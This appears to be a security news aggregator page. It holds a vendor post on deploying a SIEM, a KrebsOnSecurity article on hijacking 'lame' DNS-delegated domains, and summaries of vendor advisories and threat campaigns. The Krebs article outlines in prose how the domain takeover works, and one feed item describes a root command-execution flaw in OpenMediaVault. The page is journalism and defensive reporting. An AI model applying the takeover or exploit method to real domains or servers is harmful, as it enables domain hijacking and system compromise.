But how should a full-fledged SIEM in a company with 500 to 3000 employees be implemented? Today we tell you how, and as the title to this post suggests – its best done  phase by phase… First of all – choose an SIEM solution This ones easy: pick one of the few relatively inexpensive commercial products suitable for medium-sized businesses, or a free open-source solution. Why the quotation marks, you may ask. Because although the license costs nothing, the implementation will consume significant resources and a lot of your infosec teams time. Youll need much, much longer (several-fold) than you would for implementing a commercial product — both before and after you go live. Without going into the details, lets just say that there are no complete out-of-the-box open-source SIEM solutions. Youd have to assemble one from available components, adjusting them to be interoperable: an ELK stack or OpenSearch storage, collectors and agents based on one or several OSSEC/Snort/Suricata tools, investigation and response tools (Mozdef), and so on. The popular OSSIM and Prelude projects are likewise each a compilation of different tools, so supporting these is by no means easier, while scaling options are constrained by your IT/infosec teams available time and specific skills. Hardware is another thing to consider besides the direct software costs and person-hours. All but a few SIEM systems are quite demanding on hardware, and youll have to purchase or rent a server for the go-live specifically. The Kaspersky Unified Monitoring and Analysis SIEM platform, with its best-in-class performance, is a welcome exception. It boasts sensible hardware requirements and also support for virtual deployments. You can deploy it on a single server or distribute it across the organization if needed by spinning up a collector in each of your offices. Define data sources for SIEM You need to work with your business to identify what to monitor with the SIEM. This isnt as trivial as it may sound: besides helping you catch hackers, a SIEM can keep an eye on many other events, such as server overload or even some business performance metrics like the rate of inventory issue from a warehouse. Network devices, servers, ordinary computers and applications can all be data sources. Detailed planning of data sources ensures that the SIEM solution is properly configured and able to monitor all critical assets. EDR is typically the primary source, as it provides detailed information about server and workstation events structured in an infosec-friendly way, while generating little noise of irrelevant alerts. We obviously recommend Kaspersky EDR Expert, which can feed SIEM with both raw events data and detections associated with complex attacks. Configure the SIEM solution With the list of data sources approved, you now need to configure your SIEM solution to collect and analyze security data from those sources. This includes installing data collection agents and setting up correlation rules to identify potential security threats. Nearly every SIEM system comes prepackaged with default correlation rules – but they have to be adjusted to the companys realities. After the initial setup, some rules will require correction: you need to thoroughly test the situations of both an excess and a lack of alerts. Train employees SIEM solutions require trained personnel for effective management and monitoring. The infosec team at a small company typically consists of generalists – jacks of all trades. Therefore, each member of the team should be proficient in the basic SIEM skills. Luckily, an SIEM system saves time on routine work such as searching for applications storing outdated passwords or triaging the backlog of notifications in your inbox. This motivates everyone to use the new tool. Support the SIEM system and keep it up to date SIEM is a living and breathing tool that needs regular support and adjustments as an organization grows and evolves. Noisy and ineffective rules must be deprioritized or deactivated, and further correlation rules designed to recognize new threats must be tested. You can learn more about the Kaspersky Unified Monitoring and Analysis platform and request a demo on its official web page.

image for Don’t Let Your Dom ...

 A Little Sunshine

More than a million domain names — including many registered by Fortune 100 firms and brand protection companies — are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds. Image: Shutterstock. Your   show more ...

Web browser knows how to find a site like example.com thanks to the global Domain Name System (DNS), which serves as a kind of phone book for the Internet by translating human-friendly website names (example.com) into numeric Internet addresses. When someone registers a domain name, the registrar will typically provide two sets of DNS records that the customer then needs to assign to their domain. Those records are crucial because they allow Web browsers to find the Internet address of the hosting provider that is serving that domain. But potential problems can arise when a domain’s DNS records are “lame,” meaning the authoritative name server does not have enough information about the domain and can’t resolve queries to find it. A domain can become lame in a variety of ways, such as when it is not assigned an Internet address, or because the name servers in the domain’s authoritative record are misconfigured or missing. The reason lame domains are problematic is that a number of Web hosting and DNS providers allow users to claim control over a domain without accessing the true owner’s account at their DNS provider or registrar. If this threat sounds familiar, that’s because it is hardly new. Back in 2019, KrebsOnSecurity wrote about thieves employing this method to seize control over thousands of domains registered at GoDaddy, and using those to send bomb threats and sextortion emails (GoDaddy says they fixed that weakness in their systems not long after that 2019 story). In the 2019 campaign, the spammers created accounts on GoDaddy and were able to take over vulnerable domains simply by registering a free account at GoDaddy and being assigned the same DNS servers as the hijacked domain. Three years before that, the same pervasive weakness was described in a blog post by security researcher Matthew Bryant, who showed how one could commandeer at least 120,000 domains via DNS weaknesses at some of the world’s largest hosting providers. Incredibly, new research jointly released today by security experts at Infoblox and Eclypsium finds this same authentication weakness is still present at a number of large hosting and DNS providers. “It’s easy to exploit, very hard to detect, and it’s entirely preventable,” said Dave Mitchell, principal threat researcher at Infoblox. “Free services make it easier [to exploit] at scale. And the bulk of these are at a handful of DNS providers.” SITTING DUCKS Infoblox’s report found there are multiple cybercriminal groups abusing these stolen domains as a globally dispersed “traffic distribution system,” which can be used to mask the true source or destination of web traffic and to funnel Web users to malicious or phishous websites. Commandeering domains this way also can allow thieves to impersonate trusted brands and abuse their positive or at least neutral reputation when sending email from those domains, as we saw in 2019 with the GoDaddy attacks. “Hijacked domains have been used directly in phishing attacks and scams, as well as large spam systems,” reads the Infoblox report, which refers to lame domains as “Sitting Ducks.” “There is evidence that some domains were used for Cobalt Strike and other malware command and control (C2). Other attacks have used hijacked domains in targeted phishing attacks by creating lookalike subdomains. A few actors have stockpiled hijacked domains for an unknown purpose.” Eclypsium researchers estimate there are currently about one million Sitting Duck domains, and that at least 30,000 of them have been hijacked for malicious use since 2019. “As of the time of writing, numerous DNS providers enable this through weak or nonexistent verification of domain ownership for a given account,” Eclypsium wrote. The security firms said they found a number of compromised Sitting Duck domains were originally registered by brand protection companies that specialize in defensive domain registrations (reserving look-alike domains for top brands before those names can be grabbed by scammers) and combating trademark infringement. For example, Infoblox found cybercriminal groups using a Sitting Duck domain called clickermediacorp[.]com, which was a CBS Interactive Inc. domain initially registered in 2009 at GoDaddy. However, in 2010 the DNS was updated to DNSMadeEasy.com servers, and in 2012 the domain was transferred to MarkMonitor. Another hijacked Sitting Duck domain — anti-phishing[.]org — was registered in 2003 by the Anti-Phishing Working Group (APWG), a cybersecurity not-for-profit organization that closely tracks phishing attacks. In many cases, the researchers discovered Sitting Duck domains that appear to have been configured to auto-renew at the registrar, but the authoritative DNS or hosting services were not renewed. The researchers say Sitting Duck domains all possess three attributes that makes them vulnerable to takeover: 1) the domain uses or delegates authoritative DNS services to a different provider than the domain registrar; 2) the authoritative name server(s) for the domain does not have information about the Internet address the domain should point to; 3) the authoritative DNS provider is “exploitable,” i.e. an attacker can claim the domain at the provider and set up DNS records without access to the valid domain owner’s account at the domain registrar. Image: Infoblox. How does one know whether a DNS provider is exploitable? There is a frequently updated list published on GitHub called “Can I take over DNS,” which has been documenting exploitability by DNS provider over the past several years. The list includes examples for each of the named DNS providers. In the case of the aforementioned Sitting Duck domain clickermediacorp[.]com, the domain was originally registered by , but it appears to have been hijacked by scammers by claiming it at the web hosting firm DNSMadeEasy, which is owned by Digicert, one of the industry’s largest issuers of digital certificates (SSL/TLS certificates). In an interview with KrebsOnSecurity, DNSMadeEasy founder and senior vice president Steve Job said the problem isn’t really his company’s to solve, noting that DNS providers who are also not domain registrars have no real way of validating whether a given customer legitimately owns the domain being claimed. “We do shut down abusive accounts when we find them,” Job said. “But it’s my belief that the onus needs to be on the [domain registrants] themselves. If you’re going to buy something and point it somewhere you have no control over, we can’t prevent that.” Infoblox, Eclypsium, and the DNS wiki listing at Github all say that web hosting giant Digital Ocean is among the vulnerable hosting firms. In response to questions, Digital Ocean said it was exploring options for mitigating such activity. “The DigitalOcean DNS service is not authoritative, and we are not a domain registrar,” Digital Ocean wrote in an emailed response. “Where a domain owner has delegated authority to our DNS infrastructure with their registrar, and they have allowed their ownership of that DNS record in our infrastructure to lapse, that becomes a ‘lame delegation’ under this hijack model. We believe the root cause, ultimately, is poor management of domain name configuration by the owner, akin to leaving your keys in your unlocked car, but we acknowledge the opportunity to adjust our non-authoritative DNS service guardrails in an effort to help minimize the impact of a lapse in hygiene at the authoritative DNS level. We’re connected with the research teams to explore additional mitigation options.” In a statement provided to KrebsOnSecurity, the hosting provider and registrar Hostinger said they were working to implement a solution to prevent lame duck attacks in the “upcoming weeks.” “We are working on implementing an SOA-based domain verification system,” Hostinger wrote. “Custom nameservers with a Start of Authority (SOA) record will be used to verify whether the domain truly belongs to the customer. We aim to launch this user-friendly solution by the end of August. The final step is to deprecate preview domains, a functionality sometimes used by customers with malicious intents. Preview domains will be deprecated by the end of September. Legitimate users will be able to use randomly generated temporary subdomains instead.” What did DNS providers that have struggled with this issue in the past do to address these authentication challenges? The security firms said that to claim a domain name, the best practice providers gave the account holder random name servers that required a change at the registrar before the domains could go live. They also found the best practice providers used various mechanisms to ensure that the newly assigned name server hosts did not match previous name server assignments. [Side note: Infoblox observed that many of the hijacked domains were being hosted at Stark Industries Solutions, a sprawling hosting provider that appeared two weeks before Russia invaded Ukraine and has become the epicenter of countless cyberattacks against enemies of Russia]. Both Infoblox and Eclypsium said that without more cooperation and less finger-pointing by all stakeholders in the global DNS, attacks on sitting duck domains will continue to rise, with domain registrants and regular Internet users caught in the middle. “Government organizations, regulators, and standards bodies should consider long-term solutions to vulnerabilities in the DNS management attack surface,” the Infoblox report concludes.

 Trends, Reports, Analysis

The Blue Report 2024 highlights alarming findings, with 40% of environments vulnerable to total takeover, emphasizing the importance of cybersecurity. Prevention effectiveness has improved to 69%, but detection effectiveness has dropped to 12%.

 Malware and Vulnerabilities

The notorious Trik botnet, aka Phorpiex, is being sold in antivirus circles, offering advanced capabilities to evade detection. This C++ botnet includes modules such as a crypto clipper, a USB emitter, and a PE infector targeting crypto wallets.

 Malware and Vulnerabilities

Ubuntu has fixed two vulnerabilities in OpenVPN, a virtual private network software. These vulnerabilities could keep the closing session active or lead to denial of service. Canonical released security updates for affected Ubuntu releases.

 Feed

OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.

 Feed

Ubuntu Security Notice 6934-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.39 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 24.04 LTS. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

 Feed

Ubuntu Security Notice 6932-1 - It was discovered that the Hotspot component of OpenJDK 21 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered   show more ...

that the Hotspot component of OpenJDK 21 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6931-1 - It was discovered that the Hotspot component of OpenJDK 17 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered   show more ...

that the Hotspot component of OpenJDK 17 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6930-1 - It was discovered that the Hotspot component of OpenJDK 11 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered   show more ...

that the Hotspot component of OpenJDK 11 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6929-1 - It was discovered that the Hotspot component of OpenJDK 8 was not properly performing bounds when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered   show more ...

that the Hotspot component of OpenJDK 8 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6928-1 - It was discovered that the Python ssl module contained a memory race condition when handling the APIs to obtain the CA certificates and certificate store statistics. This could possibly result in applications obtaining wrong results, leading to various SSL issues. It was discovered that   show more ...

the Python ipaddress module contained incorrect information about which IP address ranges were considered "private" or "globally reachable". This could possibly result in applications applying incorrect security policies.

 Feed

Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.

 Feed

Red Hat Security Advisory 2024-4933-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a denial of service vulnerability.

 Feed

Red Hat Security Advisory 2024-4922-03 - Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.

 Feed

Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a record $1.4 billion settlement with the U.S. state of Texas over allegations that it illegally collected biometric data of millions of users without their permission, marking one of the largest penalties levied by regulators against the tech giant. "This historic settlement demonstrates our commitment to standing up to

 Feed

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems. The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East. "This form of attack is an

 Feed

Japanese organizations are the target of a Chinese nation-state threat actor that leverages malware families like LODEINFO and NOOPDOOR to harvest sensitive information from compromised hosts while stealthily remaining under the radar in some cases for a time period ranging from two to three years. Israeli cybersecurity company Cybereason is tracking the campaign under the name Cuckoo Spear,

 Feed

We’ll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we’re all struggling to keep security teams fully staffed.  Given that reality, security teams need to be able to monitor and respond to threats

 Feed

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign. The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud. "Of those 107,000 malware samples, over 99,000 of

 Feed

Companies in Russia and Moldova have been the target of a phishing campaign orchestrated by a little-known cyber espionage group known as XDSpy. The findings come from cybersecurity firm F.A.C.C.T., which said the infection chains lead to the deployment of a malware called DSDownloader. The activity was observed this month, it added. XDSpy is a threat actor of indeterminate origin that was first

 Feed

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain. The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV). "Before issuing a certificate to a

2024-07
Aggregator history
Wednesday, July 31
MON
TUE
WED
THU
FRI
SAT
SUN
JulyAugustSeptember